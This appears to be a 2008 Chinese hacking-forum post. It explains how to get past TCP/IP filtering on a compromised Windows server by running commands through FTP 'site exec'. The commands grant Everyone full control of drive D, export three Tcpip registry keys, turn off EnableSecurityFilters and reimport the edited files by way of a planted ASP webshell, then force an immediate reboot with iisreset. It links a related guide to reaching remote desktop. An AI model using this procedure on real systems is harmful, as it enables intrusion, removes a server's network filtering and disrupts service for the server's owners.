通过FTP进行突破IP筛选

  wjxd726 ·  2008-09-05 17:09  ·  39148 次点击
类似贴:
Quote:
从上传webshell到突破TCP/IP筛选到3389终端登陆http://www.hxhack.com/bbs/read.php?tid-75949-keyword-IP%C9%B8%D1%A1.html
quotesiteexec"cacls.exed:/e/t/geveryone:F"#把d盘设置为everyone可以浏览这样一会导出文件放D盘就可以下载了...
quotesiteexec"regedit-eD:\1.regHKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip"#导出注册表里关于TCP/IP筛选的第一处(-eD:\1.reg导出后放在D盘下,文件1.reg)
quotesiteexec"regedit-eD:\2.reg
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip"#导出注册表里关于TCP/IP筛选的第二处
quotesiteexec"regedit-eD:\3.reg
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip"#导出注册表里关于TCP/IP筛选的第三处
全部导出了,然后回ASP马,把三个下下来...
编辑一下,把关于TCP/IP筛选的几个地方改一下,首先打开1.reg找到"EnableSecurityFilters"=dword:00000001把最后面的数字1改成0后保存,然后更改2.reg,3.reg,更改方法一样.改好后保存...然后上传,覆盖...OK.....
在回来FTP命令下....
quotesiteexec"regedit-sD:\1.reg"
quotesiteexec"regedit-sD:\2.reg"
quotesiteexec"regedit-sD:\3.reg"
OK.........
导入后要从起,,,那我们让他从起吧...
quotesiteexec"iisreset/reboot/timeout:00"#利用他自身的iis服务来重新启动他的机器,/timeout:00这个参数是让他立即重新启动..

0 条回复

暂无讨论,说说你的看法吧!

 回复

你需要  登录  或  注册  后参与讨论!